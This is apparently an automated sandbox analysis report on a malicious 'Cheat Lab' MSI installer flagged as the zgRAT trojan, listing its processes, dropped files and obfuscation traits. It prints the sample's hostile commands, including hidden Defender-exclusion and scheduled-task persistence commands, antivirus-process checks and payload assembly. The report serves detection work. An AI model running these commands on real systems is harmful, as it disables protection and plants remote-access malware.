                        Source: 29.3.Carbon.pif.39a94e8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 31.2.jsc.exe.1390000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Strings.csCryptographic APIs: 'CreateDecryptor'
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Ea7RDL6j6306s6g3fyv.csCryptographic APIs: 'CreateDecryptor'
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Ea7RDL6j6306s6g3fyv.csCryptographic APIs: 'CreateDecryptor'
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Strings.csCryptographic APIs: 'CreateDecryptor'
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Ea7RDL6j6306s6g3fyv.csCryptographic APIs: 'CreateDecryptor'
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Ea7RDL6j6306s6g3fyv.csCryptographic APIs: 'CreateDecryptor'
                        Source: classification engineClassification label: mal84.troj.adwa.spyw.evad.winMSI@49/74@3/4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD581D4 GetLastError,FormatMessageA,11_2_00007FF7BAD581D4
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_009517A1 AdjustTokenPrivileges,CloseHandle,29_2_009517A1
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00951DA5 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,29_2_00951DA5
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004032B5 GetDiskFreeSpaceExW,SendMessageW,16_2_004032B5
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095DAC1 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,29_2_0095DAC1
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_004038DD SHGetSpecialFolderPathW,CoCreateInstance,16_2_004038DD
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00404C1A GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetProcAddress,GetProcAddress,wsprintfW,GetProcAddress,16_2_00404C1A
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Cheat Lab IncJump to behavior
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].jsonJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Winter741
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF2CE.tmpJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                        Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.2.msi"
                        Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 30FEA9F9E3926AA1391EB6E446524DF5 C
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F28D3D46A9F6C7BEC118E0AE5C649DD3
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss87C.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi86A.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr86B.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr86C.txt" -propSep " :<->: " -testPrefix "_testValue."
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AF5482846545A3FBF6C3EBE62A323063 E Global\MSI0000
                        Source: unknownProcess created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Register-ScheduledTask -TaskName 'Y29ubmVjdDc0MQ==' -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe') -Trigger (New-ScheduledTaskTrigger -At (Get-Date).AddMinutes(1) -Once) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable) -Force"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k cmd < Roommates & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir 28945
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Dns + Pontiac + Milfhunter + Ruling + Supervisor 28945\Carbon.pif
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Entered + Conferences 28945\w
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif 28945\Carbon.pif 28945\w
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 30FEA9F9E3926AA1391EB6E446524DF5 CJump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F28D3D46A9F6C7BEC118E0AE5C649DD3Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AF5482846545A3FBF6C3EBE62A323063 E Global\MSI0000Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\configJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss87C.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi86A.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr86B.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr86C.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }Jump to behavior
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Register-ScheduledTask -TaskName 'Y29ubmVjdDc0MQ==' -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe') -Trigger (New-ScheduledTaskTrigger -At (Get-Date).AddMinutes(1) -Once) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable) -Force"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k cmd < Roommates & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir 28945
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Dns + Pontiac + Milfhunter + Ruling + Supervisor 28945\Carbon.pif
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Entered + Conferences 28945\w
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif 28945\Carbon.pif 28945\w
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\System32\msiexec.exeAutomated click: Install
                        Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: OK
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab IncJump to behavior
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat LabJump to behavior
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\configJump to behavior
                        Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeJump to behavior
                        Source: Cheat.Lab.2.7.2.msiStatic file information: File size 3107840 > 1048576
                        Source: Binary string: Z:\7zsfxmm-51139022f6d790da60884077b63b2f265052be0b\Output\Win32\7ZSfxMod.pdb source: connect.exe, 00000010.00000000.2470216171.0000000000426000.00000002.00000001.01000000.00000009.sdmp, connect.exe, 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp

                        Data Obfuscation

                        barindex
                        .NET source code contains method to dynamically call methods (often used by packers)
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Ea7RDL6j6306s6g3fyv.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Ea7RDL6j6306s6g3fyv.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Register-ScheduledTask -TaskName 'Y29ubmVjdDc0MQ==' -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe') -Trigger (New-ScheduledTaskTrigger -At (Get-Date).AddMinutes(1) -Once) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable) -Force"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force }Jump to behavior
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Register-ScheduledTask -TaskName 'Y29ubmVjdDc0MQ==' -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe') -Trigger (New-ScheduledTaskTrigger -At (Get-Date).AddMinutes(1) -Once) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable) -Force"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_008F4E68 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,29_2_008F4E68
                        Source: Dns.16.drStatic PE information: real checksum: 0xf5a21 should be: 0x3d92c
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B2ED2A5 pushad ; iretd 6_2_00007FFD9B2ED2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B407564 push ebx; iretd 6_2_00007FFD9B40756A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B40C535 push ebx; retf 6_2_00007FFD9B40C53A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B4D71C5 push ebp; retf 6_2_00007FFD9B4D71C8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_3_00007FF79D57818A pushfd ; retn 0000h11_3_00007FF79D57818B
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_3_00007FF79D577D0B pushfd ; retn 0000h11_3_00007FF79D577D0C
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BAD3499C push rbp; ret 11_2_00007FF7BAD349D8
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADACF9D push rdi; ret 11_2_00007FF7BADACFA4
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeCode function: 11_2_00007FF7BADAD529 push rdi; ret 11_2_00007FF7BADAD532
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B2BD2A5 pushad ; iretd 14_2_00007FFD9B2BD2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B3DADE8 push eax; ret 14_2_00007FFD9B3DAFE1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B3D5F27 push esp; retf 14_2_00007FFD9B3D5F28
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B3DAF28 push eax; ret 14_2_00007FFD9B3DAFE1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9B3D3568 push E95E53ABh; ret 14_2_00007FFD9B3D3599
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_0041A1F6 push ecx; ret 16_2_0041A209
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00419CE4 push eax; ret 16_2_00419D02
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00910DC6 push ecx; ret 29_2_00910DD9
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeCode function: 31_2_019BE0C3 pushad ; iretd 31_2_019BE249
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Ea7RDL6j6306s6g3fyv.csHigh entropy of concatenated method names: 'hFEEqEbcYR', 'g38PJ8K3c0', 'KLjExgoVqt', 'uK7EIy74hq', 'qyvE20Kp8S', 'Re8EV9gH2x', 'hBfIKvmKjt', 'fiT6lGqjpY', 'qu86nCICHn', 'Ryg6if8UNr'
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, Di7ikruKq90A5QE6ix.csHigh entropy of concatenated method names: 'rijWrX6jX', 'ceWMIZ7EW', 'KYGPgj2ds', 'D2iww7kgw', 'L6TzeU1J7', 'XRAa5McJe1', 'T9daaHJGMP', 'dB7amCN7wt', 'ppiaOJnqVl', 'tL7a4MkqYU'
                        Source: 29.3.Carbon.pif.39a94e8.0.raw.unpack, L40WGTESFRlM7HtX2Nl.csHigh entropy of concatenated method names: 'P0GEvEBiq1', 'K4vE93JS2m', 'KgVELXZnKg', 'jnLEtSteI7', 'h4NEZRG9dX', 'lHREfx51na', 'u74EuWB1C5', 'aCpERtciCW', 'z99EWA4xCa', 'eIHEMdvo5N'
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Ea7RDL6j6306s6g3fyv.csHigh entropy of concatenated method names: 'hFEEqEbcYR', 'g38PJ8K3c0', 'KLjExgoVqt', 'uK7EIy74hq', 'qyvE20Kp8S', 'Re8EV9gH2x', 'hBfIKvmKjt', 'fiT6lGqjpY', 'qu86nCICHn', 'Ryg6if8UNr'
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, Di7ikruKq90A5QE6ix.csHigh entropy of concatenated method names: 'rijWrX6jX', 'ceWMIZ7EW', 'KYGPgj2ds', 'D2iww7kgw', 'L6TzeU1J7', 'XRAa5McJe1', 'T9daaHJGMP', 'dB7amCN7wt', 'ppiaOJnqVl', 'tL7a4MkqYU'
                        Source: 29.3.Carbon.pif.39067e0.4.raw.unpack, L40WGTESFRlM7HtX2Nl.csHigh entropy of concatenated method names: 'P0GEvEBiq1', 'K4vE93JS2m', 'KgVELXZnKg', 'jnLEtSteI7', 'h4NEZRG9dX', 'lHREfx51na', 'u74EuWB1C5', 'aCpERtciCW', 'z99EWA4xCa', 'eIHEMdvo5N'

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with a suspicious file extension
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF2CE.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF3FB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF527.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7E2.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF557.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI695.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4F2F.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5924.tmpJump to dropped file
                        Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeFile created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzQx.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF577.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5963.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF479.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI743.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\DnsJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF3DB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4E34.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI773.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF507.tmpJump to dropped file
